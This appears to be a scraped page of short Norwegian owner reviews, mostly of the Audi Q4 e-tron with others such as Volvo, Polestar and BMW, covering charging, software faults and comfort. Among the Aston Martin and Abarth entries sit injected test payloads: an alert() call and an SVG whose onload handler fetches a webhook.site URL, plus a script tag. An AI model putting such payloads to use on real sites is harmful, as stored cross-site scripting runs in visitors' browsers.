Vurdert av nilsk
Audi Q4 e-tron (2024)
Kjøpte først en Q4 50 e-tron sensommer 2021. Hadde utrolig mye problemer både med knirking i interiør, software problemer og svært dårlig ladeeffekt. Når andre generasjon Q4 kom fikk jeg tilbud
Audi Q4 e-tron (2022)
Dårlig bil. Kjøper ikke Audi igjen
Audi Q4 e-tron (2022)
For de som vil ha den ekstra gode premiumfølelsen så er Audi q4 et godt valg. S-line interiøret med HUD og Matrix kjørelys gid det kille ekstra som skal til.
Audi Q4 e-tron (2022)
OK bil med mye problemer, levert av en elendig importør (Møller)
Audi Q4 e-tron (2022)
Er fornøyd med bilen når den bare fungerer, men etter bare 28000 km har det vært altfor mye teknisk- og programvaretrøbbel. Elendig app, det eneste den er brukende til, er å se ladestatus. Ble lo
Audi Q4 e-tron (2022)
Gode kjøreegenskaper. For mange feil i programvaren. Lader sakte, og ikke spesielt lavt strømforbruk. Bilen kjørt 25000 km på 2 år. Venter fortsatt på programvareoppdatering.
Audi Q4 e-tron (2022)
Min beste bil så langt.
Audi Q4 e-tron (2022)
Behagelig, rask og trygg. Min beste bil
Audi Q4 e-tron (2022)
Audi Q4 e-tron (2022)
Pen bil, bruker mye strøm. Veldig vanskelig å lade.
Audi Q4 e-tron (2022)
Synes bilen lader tregt på lynladerne sammenlignet med andre elbiler i samme prisklasse
Audi Q4 e-tron (2022)
Svarer stort sett til forventningene.
Audi Q4 e-tron (2022)
Kort sagt meget fornøyd etter fire mnd.
Audi Q4 e-tron (2022)
Tar ikke mot lading. Feil varsel er veldig fremtredende. Har ingen oppdatering over nett. Mangler mye generelle informasjonssystemer som er standard på andre biler.
Audi Q4 e-tron (2022)
Grei bil med elendig app. Tullemelding i displayet hver gang den starter.
Citroën e-C4 (2025)
Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve
Aston Martin DB9 GT (2017)
alert("total")
Aston Martin DB9 GT (2017)
totalvurderingtest
Abarth 500e (2024)
Abarth 500e (2024)
Abarth 500e (2024)
xxxfooo4
Abarth 500e (2024)
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>
Volvo EX40 (2026)
Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass
Ford Explorer EV (2025)
Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.
Ford Kuga (2021)
Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring
Hongqi E-HS9 (2022)
Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!
Mercedes-Benz EQC (2022)
Topp komfort og driftsikker.
Polestar 2 (2022)
God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h
Mercedes-Benz GLE (2020)
Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km
BMW 3-Serie (2012)
Hadde det vært et punkt som het eierglede så hadde jeg glatt gitt 10 av 10!! Bilen er vakker og tvers igjennom godt bygget! Nydelig å kjøre og det meste bærer preg av å være bygget med gode mat